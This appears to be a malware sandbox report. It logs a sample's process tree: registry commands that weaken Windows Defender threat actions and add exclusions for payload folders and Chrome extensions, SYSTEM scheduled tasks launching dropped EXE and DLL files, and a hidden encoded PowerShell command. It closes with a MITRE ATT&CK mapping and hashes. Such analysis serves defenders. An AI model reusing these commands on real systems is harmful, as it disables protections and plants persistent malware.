Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵PID:520
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:3900
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2660
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:60
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:2644
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:4420
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4996
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:2388
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:4936
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:1976
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:2780
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:1172
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:3100
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:3296
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:4460
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:4392
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:2560
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:4368
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:208
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:4820
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:1944
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:968
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:4088
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:2148
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:1428
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:1088
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:3364
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:2736
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:2568
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:5080
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FohpjzYDshfCC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FohpjzYDshfCC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IoHaAJhEDYhU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IoHaAJhEDYhU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KCGdmeQdU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KCGdmeQdU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hgFvgKbJayUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hgFvgKbJayUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\uqeRQcQeSVSWnHVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\uqeRQcQeSVSWnHVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RZfGRCgJsrDIEOco\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RZfGRCgJsrDIEOco\" /t REG_DWORD /d 0 /reg:64;"2⤵PID:2584
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FohpjzYDshfCC" /t REG_DWORD /d 0 /reg:323⤵PID:192
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FohpjzYDshfCC" /t REG_DWORD /d 0 /reg:324⤵PID:1316
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FohpjzYDshfCC" /t REG_DWORD /d 0 /reg:643⤵PID:4824
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IoHaAJhEDYhU2" /t REG_DWORD /d 0 /reg:323⤵PID:3464
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IoHaAJhEDYhU2" /t REG_DWORD /d 0 /reg:643⤵PID:2564
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KCGdmeQdU" /t REG_DWORD /d 0 /reg:323⤵PID:1232
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KCGdmeQdU" /t REG_DWORD /d 0 /reg:643⤵PID:5064
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR" /t REG_DWORD /d 0 /reg:323⤵PID:1012
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR" /t REG_DWORD /d 0 /reg:643⤵
- Drops file in Windows directory
PID:4972
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hgFvgKbJayUn" /t REG_DWORD /d 0 /reg:323⤵PID:1132
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hgFvgKbJayUn" /t REG_DWORD /d 0 /reg:643⤵PID:2692
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\uqeRQcQeSVSWnHVB /t REG_DWORD /d 0 /reg:323⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3928
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\uqeRQcQeSVSWnHVB /t REG_DWORD /d 0 /reg:643⤵PID:4696
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:3008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:2108
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt /t REG_DWORD /d 0 /reg:323⤵PID:4324
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt /t REG_DWORD /d 0 /reg:643⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3096
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\RZfGRCgJsrDIEOco /t REG_DWORD /d 0 /reg:323⤵PID:2552
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\RZfGRCgJsrDIEOco /t REG_DWORD /d 0 /reg:643⤵PID:1744
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gbEkeprHs" /SC once /ST 02:21:27 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:424
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gbEkeprHs"2⤵PID:1296
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gbEkeprHs"2⤵PID:2692
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "YsLxjqvMZrWymyIEG" /SC once /ST 01:00:34 /RU "SYSTEM" /TR "\"C:\Windows\Temp\RZfGRCgJsrDIEOco\aRhQLhcCIAxmkyn\WvvqjhM.exe\" s7 /gFsite_idpbw 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4040
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "YsLxjqvMZrWymyIEG"2⤵PID:3560
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2780
-
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:352
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious use of AdjustPrivilegeToken
PID:560 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4680
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:3176
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1316
-
C:\Windows\Temp\RZfGRCgJsrDIEOco\aRhQLhcCIAxmkyn\WvvqjhM.exeC:\Windows\Temp\RZfGRCgJsrDIEOco\aRhQLhcCIAxmkyn\WvvqjhM.exe s7 /gFsite_idpbw 385118 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
PID:2552 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bwKBwqZYjkqxftWshF"2⤵PID:5072
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:4536
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:2916
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:4340
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:4392
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\KCGdmeQdU\tQIJpO.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "SMPpzaSdDqsJvHF" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2212
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "SMPpzaSdDqsJvHF2" /F /xml "C:\Program Files (x86)\KCGdmeQdU\qzQQpMr.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:220
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "SMPpzaSdDqsJvHF"2⤵PID:2144
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "SMPpzaSdDqsJvHF"2⤵PID:2776
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "znrIDUvoucqewg" /F /xml "C:\Program Files (x86)\IoHaAJhEDYhU2\fqhmiWI.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4396
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KVEvoYrDZKLqM2" /F /xml "C:\ProgramData\uqeRQcQeSVSWnHVB\IqVVNEF.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3364
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "RHUfDusjVndeEILcZ2" /F /xml "C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR\UqwNxxt.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3744 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1316
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BxzpJXegsLHBOSWsuyU2" /F /xml "C:\Program Files (x86)\FohpjzYDshfCC\skRIrpI.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3464
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "EtrQGzrpWMpnyWxNE" /SC once /ST 01:54:41 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\RZfGRCgJsrDIEOco\GqABjEHf\xpsTNTc.dll\",#1 /Obsite_idbxT 385118" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2700 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2900
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "EtrQGzrpWMpnyWxNE"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:520
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:4704
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:4032
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:3296
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:3120
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "YsLxjqvMZrWymyIEG"2⤵PID:1136
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2584
-
-
-
\??\c:\windows\system32\rundll32.EXEc:\windows\system32\rundll32.EXE "C:\Windows\Temp\RZfGRCgJsrDIEOco\GqABjEHf\xpsTNTc.dll",#1 /Obsite_idbxT 3851181⤵PID:688
-
C:\Windows\SysWOW64\rundll32.exec:\windows\system32\rundll32.EXE "C:\Windows\Temp\RZfGRCgJsrDIEOco\GqABjEHf\xpsTNTc.dll",#1 /Obsite_idbxT 3851182⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:860 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "EtrQGzrpWMpnyWxNE"3⤵PID:4332
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4936
-
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
4Disable or Modify System Firewall
1Disable or Modify Tools
3Modify Registry
6Subvert Trust Controls
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.4MB
MD5c21044b1def34f14e058f28e998694d1
SHA1f43b0157aa7766c60bded1f5193c5800337388c0
SHA2567152f23398dbc1cbe210287ac88f1028d2f8fa01b62ebcb2f0865ff086e5d6f8
SHA51287ec13bd4f6b27ad7736afebe3a0d54ed0519d557977ea4bc4344a4404e1d8fd9c5e4641740ac376457a61ef436a794c16cfc556fbeb31e42278bf4cafc1a014
-
Filesize
4KB
MD51bfe591a4fe3d91b03cdf26eaacd8f89
SHA1719c37c320f518ac168c86723724891950911cea
SHA2569cf94355051bf0f4a45724ca20d1cc02f76371b963ab7d1e38bd8997737b13d8
